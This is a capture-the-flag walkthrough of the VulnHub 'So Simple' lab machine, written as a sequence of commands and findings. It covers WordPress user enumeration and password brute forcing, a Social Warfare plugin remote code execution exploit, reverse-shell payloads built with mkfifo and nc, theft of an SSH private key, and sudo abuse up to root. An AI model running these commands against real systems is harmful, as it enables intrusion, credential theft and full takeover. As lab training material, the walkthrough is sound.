CTF Walk Through - So Simple - VulnHub

Machine Link : https://www.vulnhub.com/entry/so-simple-1,515/ STEP1 arp-scan -l FINDING ---------------------------------------------------------------------------------------------------------- STEP2 nmap -p- -Pn -A -T4 -sSV FINDING 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) ---------------------------------------------------------------------------------------------------------- STEP3 dirb FINDING site is a wordpress site ---------------------------------------------------------------------------------------------------------- STEP4 wpscan --url -e at -e ap -e u FINDING Upload directory has listing enabled: admin -- user max -- user ---------------------------------------------------------------------------------------------------------- STEP5 wpscan --url -U max,admin -P /usr/share/wordlists/rockyou.txt FINDING plugins -- social-warfare -- The version is out of date -- Version: 3.5.0 plugins -- simple-cart-solution -- The version is out of date -- Version: 0.2.0 [SUCCESS] - max / opensesame -- password found ---------------------------------------------------------------------------------------------------------- STEP6 login do not help anything searchsploit Social Warfare 3.5 FINDING WordPress Plugin Social Warfare 3.5.3 - Remote Code Execution | php/webapps/46794.py ---------------------------------------------------------------------------------------------------------- STEP7 download the exploit from exploitdb python2 46794.py -h FINDING Options: -h, --help show this help message and exit -t TARGET, --target=TARGET Target Link --payload-uri=PAYLOAD URI where the file payload.txt is located. ---------------------------------------------------------------------------------------------------------- STEP8 create payload.txt on desktop with -- presystem(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&1|nc 4321 /tmp/f)/pre start python3 server -- python3 -m http.server 80 one new terminal start listner -- nc -nvlp 4321 on another terminal upload the payload -- python2 46794.py -t --payload-uri= and get the shell on nc listner ---------------------------------------------------------------------------------------------------------- STEP9 cd /home ls -la cat personal.txt FINDING SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA= https://hashes.com/en/decrypt/hash SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=:Hahahahaha, its not that easy !!! ---------------------------------------------------------------------------------------------------------- STEP10 cd max ls -la cd .ssh cat id_rsa copy it and paster in local machine chmod 666 id_rsa ---------------------------------------------------------------------------------------------------------- STEP11 ssh [email protected] -i id_rsa ls -la cat user.txt 073dafccfe902526cee753455ff1dbb0 sudo -l (steven) NOPASSWD: /usr/sbin/service ---------------------------------------------------------------------------------------------------------- STEP12 sudo -u steven /usr/sbin/service ../../bin/sh whoami steven sudo -l (root) NOPASSWD: /opt/tools/server-health.sh ---------------------------------------------------------------------------------------------------------- STEP13 create a folder tool and under it a file.sh cd /opt mkdir tools echo echo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&1|nc 4322 /tmp/f server-health.sh chmod +x server-health.sh (STEP14) sudo /opt/tools/server-health.sh ---------------------------------------------------------------------------------------------------------- STEP14 open nc on new terminal nc -nvlp 4322 whoami root cd /root cat flag.txt /$$$$$$ /$$ /$$ /$$__ $$ | $$ | $$ | $$ \__/ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$$| $$ | $$ /$$__ $$| $$__ $$ /$$__ $$ /$$__ $$|____ $$|_ $$_/ |____ /$$/| $$ | $$ | $$ \ $$| $$ \ $$| $$ \ $$| $$ \__/ /$$$$$$$ | $$ /$$$$/ |__/ | $$ $$| $$ | $$| $$ | $$| $$ | $$| $$ /$$__ $$ | $$ /$$ /$$__/ | $$$$$$/| $$$$$$/| $$ | $$| $$$$$$$| $$ | $$$$$$$ | $$$$//$$$$$$$$ /$$ \______/ \______/ |__/ |__/ \____ $$|__/ \_______/ \___/ |________/|__/ /$$ \ $$ | $$$$$$/ \______/ /$$ /$$ /$$ /$$ | $$ /$$/ | $/ | $$ \ $$ /$$//$$$$$$ /$$ /$$|_//$$ /$$ /$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$ \ $$$$//$$__ $$| $$ | $$ | $$ /$$//$$__ $$ /$$__ $$| $$ | $$ | $$| $$__ $$ /$$__ $$ /$$__ $$ \ $$/| $$ \ $$| $$ | $$ \ $$/$$/| $$$$$$$$ | $$ \ $$| $$ | $$ | $$| $$ \ $$| $$$$$$$$| $$ | $$ | $$ | $$ | $$| $$ | $$ \ $$$/ | $$_____/ | $$ | $$| $$ | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$ | $$$$$$/| $$$$$$/ \ $/ | $$$$$$$ | $$$$$$$/| $$$$$/$$$$/| $$ | $$| $$$$$$$| $$$$$$$ |__/ \______/ \______/ \_/ \_______/ | $$____/ \_____/\___/ |__/ |__/ \_______/ \_______/ | $$ /$$ /$$$$$$ /$$$$$$ /$$ | $$ /$$ /$$ | $//$$__ $$ /$$__ $$|__/ |__/ | $$ | $/ |_/| $$ \__/ /$$$$$$ | $$ \__/ /$$ /$$$$$$/$$$$ /$$$$$$ | $$ /$$$$$$|_/ | $$$$$$ /$$__ $$ | $$$$$$ | $$| $$_ $$_ $$ /$$__ $$| $$ /$$__ $$ \____ $$| $$ \ $$ \____ $$| $$| $$ \ $$ \ $$| $$ \ $$| $$| $$$$$$$$ /$$ \ $$| $$ | $$ /$$ \ $$| $$| $$ | $$ | $$| $$ | $$| $$| $$_____/ | $$$$$$/| $$$$$$/ | $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$| $$$$$$$ \______/ \______/ \______/ |__/|__/ |__/ |__/| $$____/ |__/ \_______/ | $$ | $$ |__/ Easy box right? Hope youve had fun! Show me the flag on Twitter @roelvb79 ----------------------------------------------------------------------------------------------------------

